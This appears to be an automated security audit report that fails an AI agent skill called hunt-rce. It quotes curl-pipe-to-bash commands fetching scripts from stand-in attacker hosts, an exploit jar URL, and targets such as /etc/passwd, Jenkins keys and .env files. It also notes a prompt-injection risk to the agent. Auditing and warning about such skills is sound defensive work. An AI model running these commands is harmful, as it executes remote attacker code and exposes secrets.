hunt-rce
Fail
Audited by Gen Agent Trust Hub on Jun 13, 2026
Risk Level: HIGHREMOTE_CODE_EXECUTIONCOMMAND_EXECUTIONEXTERNAL_DOWNLOADSDATA_EXFILTRATION
Full Analysis
- [REMOTE_CODE_EXECUTION]: The skill provides multiple examples of downloading and executing remote shell scripts via command-line piping, such as
curl http://attacker.com/shell | bashandcurl http://attacker/x.sh | bash. - [EXTERNAL_DOWNLOADS]: Instructions reference external, untrusted sources for exploit components, including a
.jarfile for SnakeYAML gadgets (http://attacker.com/exploit.jar) and interactions with OOB callback services likecanarytokens.org. - [DATA_EXPOSURE]: Payloads are included for reading highly sensitive system files, including
/etc/passwd, Jenkins master encryption keys (master.key,secret.key), and.envfiles containing environment secrets. - [DYNAMIC_EXECUTION]: The skill documents methods to trigger dynamic code execution via unsafe deserialization gadgets (SnakeYAML, Ruby YAML, ASP.NET ViewState) and server-side template injection (SSTI).
- [INDIRECT_PROMPT_INJECTION]: The skill creates an attack surface by ingesting untrusted data from external sources while maintaining powerful execution capabilities.
- Ingestion points: JavaScript bundles, HTTP response headers, Kubernetes API responses, and package metadata found in
SKILL.md. - Boundary markers: No delimiters or specific instructions to ignore embedded content are provided.
- Capability inventory: Shell command execution (
curl,grep,java), network tools (kubectl,nslookup), and package management commands (npm view). - Sanitization: No sanitization or validation of the ingested content is documented.
Recommendations
- HIGH: Downloads and executes remote code from: http://attacker/x.sh, http://attacker.com/shell - DO NOT USE without thorough review
- AI detected serious security threats
Audit Metadata